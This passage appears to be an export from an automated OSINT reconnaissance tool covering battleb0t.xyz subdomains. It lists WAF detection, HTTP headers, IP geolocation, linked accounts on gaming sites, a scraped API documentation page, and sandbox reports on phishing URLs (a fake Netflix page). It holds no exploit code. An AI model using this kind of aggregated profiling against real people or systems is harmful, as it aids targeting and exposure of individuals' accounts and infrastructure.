id=\"cf-footer-ip-reveal\" class=\"cf-footer-ip-reveal-btn\">Click to reveal</button>\n <span class=\"hidden\" id=\"cf-footer-ip\">2620:96:e000:b0cc:e:2:2:7</span>\n <span class=\"cf-footer-separator sm:hidden\">•</span>\n </span>\n <span class=\"cf-footer-item sm:block sm:mb-1\"><span>Performance & security by</span> <a rel=\"noopener noreferrer\" href=\"https://www.cloudflare.com/5xx-error-landing\" id=\"brand_link\" target=\"_blank\">Cloudflare</a></span>\n \n </p>\n <script>(function(){function d(){var b=a.getElementById(\"cf-footer-item-ip\"),c=a.getElementById(\"cf-footer-ip-reveal\");b&&\"classList\"in b&&(b.classList.remove(\"hidden\"),c.addEventListener(\"click\",function(){c.classList.add(\"hidden\");a.getElementById(\"cf-footer-ip\").classList.remove(\"hidden\")}))}var a=document;document.addEventListener&&a.addEventListener(\"DOMContentLoaded\",d)})();</script>\n</div><!-- /.error-footer -->\n\n\n </div><!-- /#cf-error-details -->\n </div><!-- /#cf-wrapper -->\n\n <script>\n window._cf_translation = {};\n \n \n</script>\n\n</body>\n</html>\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "Direct IP access not allowed | Cloudflare", "protocol": "HTTP/1.1", "body_size": 5906, "body_hashes": ["sha256:81e65e93698a020fe49192d7c9ffa42bda061fb7e5c8ea99e88fffab1636b9d8", "sha1:7d09f1dbda6b2258121e4b32e473c157ec6c1012"], "status_code": 403, "body_hash": "sha1:7d09f1dbda6b2258121e4b32e473c157ec6c1012", "headers": {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "S | 2a06:98c1:3121::1 |
| 2023-05-12 02:53:06 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://nuke.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://nuke.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | nuke.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | lichess (Category: gaming)
https://lichess.org/@/login | login |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 172.67.168.252 |
| 2023-05-12 02:45:59 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Chicago, Illinois, 60666, United States, North America | 104.21.71.14 |
| 2023-05-12 02:54:15 | Web Content | No | Web Spider | 4 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
| nwapi2.battleb0t.xyz |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | BIGO Live (Category: gaming)
https://www.bigo.tv/user/ayhu | ayhu |
| 2023-05-12 03:32:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.12:443 | 188.114.97.0/24 |
| 2023-05-12 03:15:36 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 165.232.113.85 |
| 2023-05-12 02:50:50 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://nitishapiplani.github.io/netflix/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c64_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c64_ConnHashTable<3172>_HashTable_Mutex"\n "IsoScope_c64_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_c64_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3172"\n "IsoScope_c64_IESQMMUTEX_0_303"\n "IsoScope_c64_IE_EarlyTabStart_0x8c8_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3172"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "104.18.22.52:443"\n "104.194.8.120:443"\n "172.64.101.10:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"i.ibb.co"\n "ka-f.fontawesome.com"\n "kit.fontawesome.com"\n "nitishapiplani.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com." (Indicator: "dir "; File: "urlref_httpsnitishapiplani.github.ionetflix")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free-fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "CabBBE4.tmp" has type "data"- Location: [%TEMP%\\CabBBE4.tmp]- [targetUID: 00000000-00002512]\n "free.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "free-fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003172]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF955EB99FAEC0BF81.TMP" has type "data"- Location: [%TEMP%\\~DF955EB99FAEC0BF81.TMP]- [targetUID: 00000000-00003172]\n "~DFAB59786306F8443C.TMP" has type "data"- Location: [%TEMP%\\~DFAB59786306F8443C.TMP]- [targetUID: 00000000-00003172]\n "~DF840616A128F2225A.TMP" has type "data"- Location: [%TEMP%\\~DF840616A128F2225A.TMP]- [targetUID: 00000000-00003172]\n "~DF104C60AD25A48D28.TMP" has type "data"- Location: [%TEMP%\\~DF104C60AD25A48D28.TMP]- [targetUID: 00000000-00003172]\n "netflix_1_.htm" has type "HTML document UTF-8 Unicode text with CRLF line terminators"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text with CRLF line terminators"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "RecoveryStore._A51A8CAF-EF99-11ED-8979-0800270D69EC_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_A51A8CB1-EF99-11ED-8979-0800270D69EC_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_AF4FEC1E-EF99-11ED-8979-0800270D69EC_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00002512]\n "free-v4-font-face.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "index_1_.js" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "L27GVFRH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L27GVFRH.txt]- [targetUID: 00000000-00002512]\n "IZ4OJTMX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IZ4OJTMX.txt]- [targetUID: 00000000-00003172]\n "300YVMPQ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\300YVMPQ.txt]- [targetUID: 00000000-00003172]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002512]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "PMD3JQRI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PMD3JQRI.txt]- [targetUID: 00000000-00002512]\n "19VOQME2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\19VOQME2.txt]- [targetUID: 00000000-00003172]\n "IDOH18CO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IDOH18CO.txt]- [targetUID: 00000000-00003172]\n "U464YG0T.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\U464YG0T.txt]- [targetUID: 00000000-00003172]\n "CabC43B.tmp" has type "data"- Location: [%TEMP%\\CabC43B.tmp]- [targetUID: 00000000-00002512]\n "CabBCD4.tmp" has type "data"- Location: [%TEMP%\\CabBCD4.tmp]- [targetUID: 00000000-00002512]\n "CabD5B4.tmp" has type "data"- Location: [%TEMP%\\CabD5B4.tmp]- [targetUID: 00000000-00002512]\n "CabBCC3.tmp" has type "data"- Location: [%TEMP%\\CabBCC3.tmp]- [targetUID: 00000000-00002512]\n "CabD5C8.tmp" has type "data"- Location: [%TEMP%\\CabD5C8.tmp]- [targetUID: 00000000-00002512]\n "CabD5B6.tmp" has type "data"- Location: [%TEMP%\\CabD5B6.tmp]- [targetUID: 00000000-00002512]\n "CabBCE4.tmp" has type "data"- Location: [%TEMP%\\CabBCE4.tmp]- [targetUID: 00000000-00002512]\n "CabBCB0.tmp" has type "data"- Location: [%TEMP%\\CabBCB0.tmp]- [targetUID: 00000000-00002512]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002512]\n "CabC48B.tmp" has type "data"- Location: [%TEMP%\\CabC48B.tmp]- [targetUID: 00000000-00002512]\n "CabD5F8.tmp" has type "data"- Location: [%TEMP%\\CabD5F8.tmp]- [targetUID: 00000000-00002512]\n "urlref_httpsnitishapiplani.github.ionetflix" has type "HTML | 185.199.108.153 |
| 2023-05-12 03:09:49 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 78.170.74.34.bc.googleusercontent.com | 34.74.170.78 |
| 2023-05-12 02:55:28 | BGP AS Membership | No | URLScan.io | 0 | 0 | 2 | 0 | None | 14061 | kekw.battleb0t.xyz |
| 2023-05-12 03:00:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | contact@millcityloans.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'104.196.30.220', u'54.196.16.164'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://hilarious-kelpie-473db1.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"unsub1.cfd"\n "www.herokucdn.com"\n "o.ss2.us"\n "crl.rootg2.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "crl.rootca1.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "crl.sca1b.amazontrust.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d00_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_d00_ConnHashTable<3328>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d00_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_d00_IESQMMUTEX_0_519"\n "IsoScope_d00_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3328"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d00_IE_EarlyTabStart_0x424_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"\n "54.196.16.164:80"\n "99.84.238.168:80"\n "99.84.238.168:443"\n "99.84.224.224:80"\n "99.84.224.90:80"\n "99.84.224.108:80"\n "99.84.224.214:80"\n "99.84.224.3:80"\n "99.84.224.217:80"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"TR7K5OKT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TR7K5OKT.txt]- [targetUID: 00000000-00003328]\n "73DA0AE306CF69ADAC457DB6B2997338" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\73DA0AE306CF69ADAC457DB6B2997338]- [targetUID: 00000000-00001732]\n "~DFC7FE55AAA15340B0.TMP" has type "data"- Location: [%TEMP%\\~DFC7FE55AAA15340B0.TMP]- [targetUID: 00000000-00003328]\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6DB145CFEEC544B1582FED1ADA3370DD]- [targetUID: 00000000-00003328]\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C6F6EC64E114822DF688DC12CDD86C]- [targetUID: 00000000-00003328]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00001732]\n "620BEF1064BD8E252C599957B3C91896" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\620BEF1064BD8E252C599957B3C91896]- [targetUID: 00000000-00001732]\n "2C9HMCBU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2C9HMCBU.txt]- [targetUID: 00000000-00003328]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003328]\n "B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B398B80134F72209547439DB21AB308D_ADE4E4D3A3BCBCA5C39C54D362D88565]- [targetUID: 00000000-00001732]\n "B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62]- [targetUID: 00000000-00001732]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003328]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003328]\n "BCB67D7ECB470284AF35679F339E879F" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BCB67D7ECB470284AF35679F339E879F]- [targetUID: 00000000-00001732]\n "~DF9154BC8BBA72FEBA.TMP" has type "data"- Location: [%TEMP%\\~DF9154BC8BBA72FEBA.TMP]- [targetUID: 00000000-00003328]\n "FVK5E2PX.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FVK5E2PX.txt]- [targetUID: 00000000-00003328]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003328]\n "~DF4D25D5B6C6F1C182.TMP" has type "data"- Location: [%TEMP%\\~DF4D25D5B6C6F1C182.TMP]- [targetUID: 00000000-00003328]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"unsub1.cfd" seems to be random\n "www.herokucdn.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://hilarious-kelpie-473db1.netlify.app/"- [Source: Input]\n Pattern match: "https://hilarious-kelpie-473db1.netlify.app"- [Source: Input]\n Pattern match: "www.herokucdn.com"- [Source: PCAP]\n Pattern match: "http://unsub1.cfd/"- [Source: PCAP]\n Heuristic match: "o.ss2.us"- [Source: PCAP]\n Heuristic match: "GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D 